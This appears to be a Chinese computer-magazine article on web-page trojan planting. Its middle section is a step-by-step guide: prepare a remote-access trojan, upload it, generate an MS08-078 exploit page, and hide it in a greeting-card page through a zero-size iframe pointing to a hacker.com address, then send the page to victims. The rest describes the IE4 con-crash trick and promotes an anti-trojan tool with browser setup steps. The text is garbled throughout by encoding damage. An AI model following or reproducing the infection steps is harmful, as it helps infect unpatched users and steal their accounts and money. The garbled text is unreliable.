黑客從這里開始掛馬

 網(wǎng)絡(luò)掛馬， 在網(wǎng)絡(luò)安全界中一直是一個(gè)長熱不衰的話題， 我們遍尋坊間的網(wǎng)絡(luò)安全工程師和網(wǎng)絡(luò)安全高手， 想探尋網(wǎng)絡(luò)掛馬為什么總會(huì)保持有如此的熱度。 得到的答案直接而干脆， 黑客想將自己的木馬病毒傳播給特定人群或者最廣泛的特定人群時(shí)， 所能夠用到的方法只有網(wǎng)絡(luò)掛馬這一種， 這也是為什么時(shí)至今日， 網(wǎng)絡(luò)掛馬都在一刻不停的每天上演。

    黎塞留在《政治遺囑》中說：“正如同總不帶武器的使命易于遭到災(zāi)禍一樣， 一個(gè)國家如果不時(shí)刻準(zhǔn)備就會(huì)有許多恐懼”。 對(duì)于一個(gè)網(wǎng)絡(luò)安全工程師而言， 網(wǎng)絡(luò)掛馬正是他們需要準(zhǔn)備的， 消除黑客威脅的核心知識(shí)。 網(wǎng)絡(luò)掛馬不僅是黑客抓取肉雞的主要方式， 往往也會(huì)對(duì)缺乏防范的網(wǎng)站和服務(wù)器構(gòu)成巨大威脅， 讓受害服務(wù)器成為病毒的源頭， 因此在新年伊始， 我們將網(wǎng)絡(luò)掛馬列為了網(wǎng)絡(luò)安全工程師首先需要掌握的基礎(chǔ)知識(shí)之一， 系統(tǒng)為大家介紹。

    銳甲團(tuán)隊(duì)惡意代碼分析員藍(lán)海：從事網(wǎng)絡(luò)安全行業(yè)近8年， 資深安全工程師， **發(fā)現(xiàn)多個(gè)軟件漏洞

進(jìn)入互聯(lián)網(wǎng)時(shí)代之后， 病毒改變了以前主要依靠可執(zhí)行文件傳播的方式， 開始通過電子郵件、軟件漏洞、內(nèi)網(wǎng)攻擊、網(wǎng)頁掛馬等多種方式傳播， 將病毒傳播的途徑變得五花八門。 不過在眾多的傳播方式中， 黑客們?nèi)匀幌矚g選用網(wǎng)頁掛馬， 網(wǎng)頁掛馬不僅僅能夠借刀殺人， 借助用戶信任的網(wǎng)站， 讓網(wǎng)絡(luò)用戶在不知不覺中中招。

    而且隨著近年來IE等瀏覽器的漏洞不斷被發(fā)現(xiàn)， 網(wǎng)頁掛馬的方法也越來越多， 成功幾率越來越高， 傳播范圍也越來越廣。 不僅如此， 可供黑客選擇的“掛馬套餐”足有上千種之多。 因此， 網(wǎng)頁掛馬成為了黑客傳播病毒的主要手段， 也成為了網(wǎng)絡(luò)安全工程師在維護(hù)Web服務(wù)器和大型網(wǎng)絡(luò)時(shí)必須具備的基礎(chǔ)技能。

    網(wǎng)絡(luò)掛馬攻擊的危害性也很大， 通常黑客選擇網(wǎng)頁掛馬手段傳播的病毒， 幾乎均為盜竊銀行賬號(hào)、網(wǎng)游賬號(hào)， 或者用戶私密文檔文件的木馬型病毒， 比起單純的中病毒丟失數(shù)據(jù)的電腦用戶， 這部分被網(wǎng)頁掛馬攻擊的用戶損失更多的是真金白銀的游戲裝備和銀行卡中的現(xiàn)金。

    網(wǎng)頁掛馬緣起

    互聯(lián)網(wǎng)興起之后， 通過網(wǎng)站向訪問者傳播植入病毒的手段就隨之出現(xiàn)了。 國內(nèi)大多數(shù)網(wǎng)民最早接觸的網(wǎng)頁病毒攻擊來自著名的Windows 98 IE4.0瀏覽器中的一個(gè)漏洞， 這個(gè)漏洞可以說最早揭開了國內(nèi)黑客通過網(wǎng)頁發(fā)動(dòng)攻擊的熱潮。

    該漏洞的利用方式非常簡單， 如同現(xiàn)在許多圖片木馬一樣， 只需要在HTML文件中寫入<img class='lazy' data-original=c:\con\con>這段HTML代碼， 凡是Windows 98 IE4.0的用戶此時(shí)再瀏覽打開包含這段代碼的HTML文件， 就會(huì)出現(xiàn)藍(lán)屏死機(jī)現(xiàn)象。 由于才做簡單， 這種惡作劇式的網(wǎng)頁攻擊方法當(dāng)年風(fēng)靡一時(shí)， 導(dǎo)致眾多網(wǎng)友在單擊陌生鏈接時(shí)唯恐藍(lán)屏。

    其實(shí)出現(xiàn)網(wǎng)絡(luò)掛馬這種現(xiàn)象， 可以說是瀏覽器在一出生時(shí)就命中注定的， 用戶在瀏覽網(wǎng)頁時(shí)， 所看到的最終網(wǎng)頁都是通過網(wǎng)絡(luò)將服務(wù)器中的數(shù)據(jù)下載到自己的電腦中后再有瀏覽器解釋生成的最終結(jié)果， 因此網(wǎng)頁中包含的各種代碼就存在被黑客惡意構(gòu)造的風(fēng)險(xiǎn)， 很容易造成漏洞。

    特別是當(dāng)年的瀏覽器鼻祖Netscape網(wǎng)景公司在推出JavaScript語言時(shí)， 設(shè)計(jì)人員就意識(shí)到如果允許網(wǎng)絡(luò)服務(wù)器將可執(zhí)行程序代碼傳遞給用戶的瀏覽器解釋， 很可能造成網(wǎng)絡(luò)安全上的風(fēng)險(xiǎn)。 其中最主要的風(fēng)險(xiǎn)莫過于不懷好意的網(wǎng)站會(huì)通過惡意代碼竊取用戶正在瀏覽的其它網(wǎng)站的秘密信息。 雖然最后網(wǎng)景公司采用了各種限制手段， 保證了JavaScript安全性， 但是這種安全性也并不是絕對(duì)的， 黑客最終還是能夠通過各種網(wǎng)絡(luò)機(jī)制中的弱點(diǎn)， 和網(wǎng)頁代碼的漏洞， 巧妙的盜取用戶的機(jī)密信息， 配合各種漏洞對(duì)網(wǎng)頁用戶發(fā)動(dòng)攻擊， 這其中就包括網(wǎng)頁掛馬。 網(wǎng)頁掛馬原理揭秘

    網(wǎng)頁掛馬到如今已經(jīng)發(fā)展出許多方法與應(yīng)用手段， 從IFRAME框架， 到利用JS文件調(diào)用網(wǎng)頁木馬， 以至于在CSS文件中插入網(wǎng)頁木馬， 或者偽裝成圖片， 甚至利用SWF、RM、AVI等文件的彈窗功能來打開網(wǎng)頁木馬， 都成為黑客經(jīng)常使用的手段。 在這其中IFRAME網(wǎng)頁框架掛馬是黑客最多用到的經(jīng)典掛馬方式， 也是最基礎(chǔ)的掛馬方式， 可以說沒有IFRAME， 網(wǎng)頁木馬中有一多半就無法實(shí)現(xiàn)完美的隱藏， 讓用戶在不察覺中受到攻擊。

    IFRAME是一個(gè)非常普通的HTML語言標(biāo)記， 它主要用來在一個(gè)網(wǎng)頁界面中， 劃分出左右或者上下的框架， 就如同我們電視中的畫中畫效果一樣， IFRAME允許網(wǎng)頁中也出現(xiàn)一個(gè)框架， 用來顯示另外一個(gè)網(wǎng)頁。 但是IFRAME功能也被黑客巧妙的利用了， 黑客在一些看似正常的網(wǎng)頁中， 使用大小為0的隱藏框架， 讓用戶在沒有察覺中打開含有漏洞溢出內(nèi)容的惡意網(wǎng)頁， 這種手法就如同在畫中畫電視中打開了一個(gè)收費(fèi)頻道， 但是由于收費(fèi)頻道的畫面尺寸被惡意修改成了0， 所以看電視的人并不知道自己已經(jīng)打開了收費(fèi)頻道， 因?yàn)樗�并沒有看到， 但是事實(shí)上收費(fèi)頻道卻的確在播放， 而且會(huì)收扣除用戶的使用費(fèi)。

    IFRAME框架掛馬實(shí)戰(zhàn)

    每當(dāng)年景不景氣時(shí)， 黑客病毒等惡意攻擊事件就會(huì)接連不斷的出現(xiàn)， “黑色星期五”病毒就是最好的證明， 據(jù)說該病毒的制造者就是因?yàn)槔习遛o退而編寫了這樣一個(gè)貽害人間的病毒。 2008年的金融危機(jī)有讓一大批計(jì)算機(jī)工程師將無聊都發(fā)泄在了制造病毒上， 特別是2008年底， 圣誕老人送給黑客們的MS08-078漏洞， 就是一個(gè)非常好的掛馬利用方法， 下面我們就為大家演示一下如何利用軟件漏洞， 配合IFRAME標(biāo)記， 進(jìn)行隱藏的框架掛馬。 下面我們做過做個(gè)演示， 比如我們將保存在電腦中的Google網(wǎng)頁中插入如下代碼：

     <iframe src=http://blog.sina.com.cn/deyumiao width=400 height=300></iframe>

    第一步：首先準(zhǔn)備一款得心應(yīng)手的木馬， 黑客通常會(huì)首選灰鴿子和PCShare， 這兩款軟件在設(shè)置上都非常簡單， 易于操作上手。 設(shè)置好相關(guān)服務(wù)， 最后聲稱木馬所用的服務(wù)控制端

    第二步：使用FTP將木馬上傳到自己的網(wǎng)站空間中， 并用記事本記錄下木馬的網(wǎng)絡(luò)路徑。 然后在用MS08-078網(wǎng)頁木馬生成器， 生成一個(gè)帶有MS08-078漏洞的惡意網(wǎng)頁。

    第三步：找一個(gè)正常的新年賀卡網(wǎng)頁， 將該網(wǎng)頁保存到自己指定的目錄中， 然后使用Web Designer或Dreamweaver網(wǎng)頁編輯軟件對(duì)保存的網(wǎng)頁進(jìn)行調(diào)整修改， 然后上傳到自己的網(wǎng)站空間中， 看圖片等內(nèi)容是否能夠正常顯示。

    第四步：然后再一次打開修改好的賀卡網(wǎng)頁， 使用IFRAME標(biāo)記語句， 將生成好的MS08-078網(wǎng)頁嵌入到賀卡網(wǎng)頁中， 嵌入掛馬代碼如下：

    <iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>

    將這段代碼插入到賀卡網(wǎng)頁之中后， 就完成了我們的網(wǎng)頁掛馬操作。 這段代碼讓正常瀏覽賀卡網(wǎng)頁的用戶， 在看到賀卡頁面之后， 也隨之運(yùn)行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出頁面， 但是由于它的長和寬都為“0”， 觀看賀卡網(wǎng)站的用戶不會(huì)看到溢出頁面， 因此非常隱蔽。 此時(shí)我們的網(wǎng)頁掛馬頁面就完成了， 只需要將這個(gè)頁面發(fā)送給其他人， 那些沒有修補(bǔ)MS08-078漏洞的用戶， 就會(huì)在不知不覺中， 中黑客設(shè)定的木馬。 防范方法

    對(duì)于IFRAME標(biāo)記這種利用正常HTML語言功能實(shí)現(xiàn)隱藏的掛馬方式， 目前并沒有好的防范方法， 因?yàn)樗�是正常的網(wǎng)頁功能。 用戶只能夠寄希望殺毒軟件和防掛馬軟件阻止利用IFRAME標(biāo)記內(nèi)嵌的溢出病毒網(wǎng)頁。

我們建議用戶在安裝殺毒軟件之后， 能夠安裝第三方防掛馬軟件作為補(bǔ)充， 下列就是我們測試的一些具有防掛馬功能的免費(fèi)軟件。

銳甲（下載地址：http://www.araymor.com/download.html）就可以幫助你防御網(wǎng)頁中的木馬， 安裝后無須任何設(shè)置， 自動(dòng)檢測網(wǎng)頁危險(xiǎn)， 遇到掛馬、帶毒網(wǎng)站時(shí)會(huì)屏蔽并提示見圖， 還能自動(dòng)修補(bǔ)漏洞。 知識(shí)目前默認(rèn)只支持IE系列瀏覽器， 不過通過巧妙的設(shè)置， 還可以讓其支持更多的瀏覽器。

    實(shí)例1

    移花接木保衛(wèi)遨游Maxthon

    如果你一直使用Maxthon 2.0瀏覽器， 可以通過下面的步驟讓銳甲支持Maxthon2：

第一步：將“plugin.ini.rar”（下載地址：http://work.newhua.com/cfan/200902/cj.rar， 快車代碼：CF0902CFRJ04）解壓后得到“plugin.ini”文件復(fù)制到銳甲程序安裝目錄下的“AModule”（默認(rèn)位置為：C:\Program Files\ARaymor\Amodule）， 接下來再將“AModule”文件夾復(fù)制到Maxthon2.0安裝目錄下的“plugin”文件夾中， 再將其重命名為“Araymor”。

    第二步：接下來再打開Maxthon2.0安裝目錄， 找到自己的Maxthon賬號(hào)對(duì)應(yīng)的文件夾（如果沒有注冊(cè)Maxthon2.0賬號(hào)， 請(qǐng)打開SharedAccount文件夾）并打開“Config”文件夾， 使用記事本程序打開“plugin.ini”文件， 找到[Paths]節(jié)， 直接增加：ARaymor=1， 保存并退出該文件。

    經(jīng)過上面的兩步設(shè)置后重新啟動(dòng)Maxthon就可以享用銳甲對(duì)網(wǎng)頁掛馬的防御了。

    實(shí)例2

    畫龍點(diǎn)睛又多倆同胞

    如果你使用的是360安全瀏覽器， 只要直接打開360安全瀏覽器的安裝目錄， 用記事本程序打開“360SE.ini”， 然后將下面的內(nèi)容添加到文件末尾， 最后保存該配置文件即可：

    [PlugIn]

    {53BEAA3C-A509-49AD-ACC3-553AD20DA38B}BHO=1

    世界之窗的添加方式類似， 只需在其安裝目錄打開它的“TheWorld.ini”文件， 將右邊的內(nèi)容添加進(jìn)入即可。